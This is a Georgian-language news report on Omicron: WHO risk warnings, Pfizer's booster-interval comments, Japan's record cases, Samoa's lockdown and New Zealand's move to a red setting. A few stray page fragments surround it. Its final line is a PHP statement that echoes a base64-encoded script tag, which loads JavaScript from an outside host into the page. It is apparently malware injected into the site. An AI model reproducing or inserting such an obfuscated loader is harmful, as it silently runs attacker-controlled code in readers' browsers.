celsiusi
ავერსი საქკაბელი
ჯანდაცვის მსოფლიო ორგანიზაციის განცხადებით, ომიკრონთან დაკავშირებული რისკი კვლავ ძალიან მაღალია, რადგან ვარიანტის გავრცელების უნარები ჰოსპიტალიზაციის მნიშვნელოვან ზრდას იწვევს.
 
Pfizer-ის ხელმძღვანელი კი აცხადებს, რომ მოვლენების არასასურველი სცენარით განვითარების შემთხვევაში, აცრა ყოველ 4-5 თვეში საჭირო იქნება, ამიტომ იმედოვნებს, რომ საუკეთესო შემთხვევაში წელიწადში ერთჯერადი ვაქცინაცია მოგვიწევს.
 
იაპონიაში ინფიცირების დღიურმა მაჩვენებელმა 50 ათასს გადააჭარბა, რაც ზედიზედ მეხუთე დღეა რეკორდული რიცხვია ქვეყნისათვის. წყნარი ოკეანის პატარა ქვეყანა სამოაში 48 საათიანი ლოქდაუნი გამოცხადდა მას შემდეგ, რაც ავსტრალიიდან ჩაფრენილ 15 მგზავრს კორონავირუსი აღმოაჩნდა.
 
ახალი ზელანდია კი ომიკრონის გავრცელების შესაჩერებლად წითელ ზონაში გადადის. საზოგადოებრივ ტრანსპორტსა და სავაჭრო ობიექტებში პირბადეების ტარება სავალდებულო ხდება. სპორტულ დარბაზებში, გასართობ დაწესებულებებსა და თავშეყრის ადგილებში კი პირებს კოვიდპასპორტების წარდგენა მოუწევთ.
 
"ომიკრონი ახლა ოკლენდში ცირკულირებს. ამ ფონზე ახალი ზელანდია 23 იანვრიდან წითელ ზონაში გადავა. ჩვენი სტრატეგია ომიკრონის გავრცელების შენელებაა. ომიკრონის მართვას ისევე ვაპირებთ როგორც დელტას შემთხვევაში იყო: გავტესტავთ სწრაფად და გამოვიძიებთ კონტაქტებს," - აცხადებს ახალი ზელანდიის პრემიერ-მინისტრი ჯასინდა არდერნი.
2014
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");